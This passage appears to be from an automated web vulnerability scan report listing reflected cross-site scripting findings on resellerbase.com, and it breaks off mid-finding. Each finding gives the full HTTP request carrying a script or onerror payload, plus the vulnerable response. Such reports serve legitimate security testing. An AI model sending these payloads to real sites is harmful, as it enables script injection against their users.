Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7f3c<script>alert(1)</script>7ad4bb23ae9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingb7f3c<script>alert(1)</script>7ad4bb23ae9/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingb7f3c<script>alert(1)</script>7ad4bb23ae9/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5499. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3c15<script>alert(1)</script>1d0a35e524f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/googlepr.phpa3c15<script>alert(1)</script>1d0a35e524f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.phpa3c15<script>alert(1)</script>1d0a35e524f was not found on this server.</p>
...[SNIP]...

2.5500. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload f1ad4<a>20a4f6198aa was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/googlepr.php?link_id=7f1ad4<a>20a4f6198aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.php?link_id=7f1ad4<a>20a4f6198aa was not found on this server.</p>
...[SNIP]...

2.5501. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3bd<script>alert(1)</script>c6fa8335fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/googlepr.php?9d3bd<script>alert(1)</script>c6fa8335fbf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.php?9d3bd<script>alert(1)</script>c6fa8335fbf=1 was not found on this server.</p>
...[SNIP]...

2.5502. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9869<script>alert(1)</script>545da06e830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea9869<script>alert(1)</script>545da06e830/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea9869<script>alert(1)</script>545da06e830/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5503. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6783e<script>alert(1)</script>78fc703698e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting6783e<script>alert(1)</script>78fc703698e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting6783e<script>alert(1)</script>78fc703698e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5504. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bdcf<script>alert(1)</script>494500c4dc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/search.php3bdcf<script>alert(1)</script>494500c4dc8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php3bdcf<script>alert(1)</script>494500c4dc8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5505. http://www.resellerbase.com/web-service/web-hosting/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9545b<a>be07f0c28f8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search9545b<a>be07f0c28f8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search9545b<a>be07f0c28f8&opt=2 was not found on this server.</p>
...[SNIP]...

2.5506. http://www.resellerbase.com/web-service/web-hosting/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3608c"><img%20src%3da%20onerror%3dalert(1)>c38f7989fac77711d was submitted in the cat parameter. This input was echoed as 3608c\"><img src=a onerror=alert(1)>c38f7989fac77711d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/web-hosting/search.php?cat=23608c"><img%20src%3da%20onerror%3dalert(1)>c38f7989fac77711d&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:48:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=23608c\"><img src=a onerror=alert(1)>c38f7989fac77711d">
...[SNIP]...

2.5507. http://www.resellerbase.com/web-service/web-hosting/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad6"><img%20src%3da%20onerror%3dalert(1)>801e9535147 was submitted in the cat parameter. This input was echoed as 3dad6\"><img src=a onerror=alert(1)>801e9535147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/web-hosting/search.php?cat=23dad6"><img%20src%3da%20onerror%3dalert(1)>801e9535147&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=23dad6\"><img src=a onerror=alert(1)>801e9535147">
...[SNIP]...

2.5508. http://www.resellerbase.com/web-service/web-hosting/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b451e<a>f47895624a0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...b451e<a>f47895624a0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...b451e<a>f47895624a0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5509. http://www.resellerbase.com/web-service/web-hosting/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ef2b<script>alert(1)</script>a090d1d60e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2&4ef2b<script>alert(1)</script>a090d1d60e6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2&4ef2b<script>alert(1)</script>a090d1d60e6=1 was not found on this server.</p>
...[SNIP]...

2.5510. http://www.resellerbase.com/web-service/web-hosting/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd28e<a>7b45bce360b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2cd28e<a>7b45bce360b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2cd28e<a>7b45bce360b was not found on this server.</p>
...[SNIP]...

2.5511. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b52fc<script>alert(1)</script>fec6a08e668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb52fc<script>alert(1)</script>fec6a08e668/web-hosting/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb52fc<script>alert(1)</script>fec6a08e668/web-hosting/themes/ was not found on this server.</p>
...[SNIP]...

2.5512. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a42e<script>alert(1)</script>c972eee95c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting8a42e<script>alert(1)</script>c972eee95c3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting8a42e<script>alert(1)</script>c972eee95c3/themes/ was not found on this server.</p>
...[SNIP]...

2.5513. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0c50<script>alert(1)</script>2ff42f258ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesa0c50<script>alert(1)</script>2ff42f258ff/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesa0c50<script>alert(1)</script>2ff42f258ff/ was not found on this server.</p>
...[SNIP]...

2.5514. http://www.resellerbase.com/web-service/web-hosting/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fd4b<script>alert(1)</script>c1b9e77580b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/?4fd4b<script>alert(1)</script>c1b9e77580b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/?4fd4b<script>alert(1)</script>c1b9e77580b=1 was not found on this server.</p>
...[SNIP]...

2.5515. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2541<script>alert(1)</script>81db2b567af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee2541<script>alert(1)</script>81db2b567af/web-hosting/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee2541<script>alert(1)</script>81db2b567af/web-hosting/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5516. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/

Issue detail

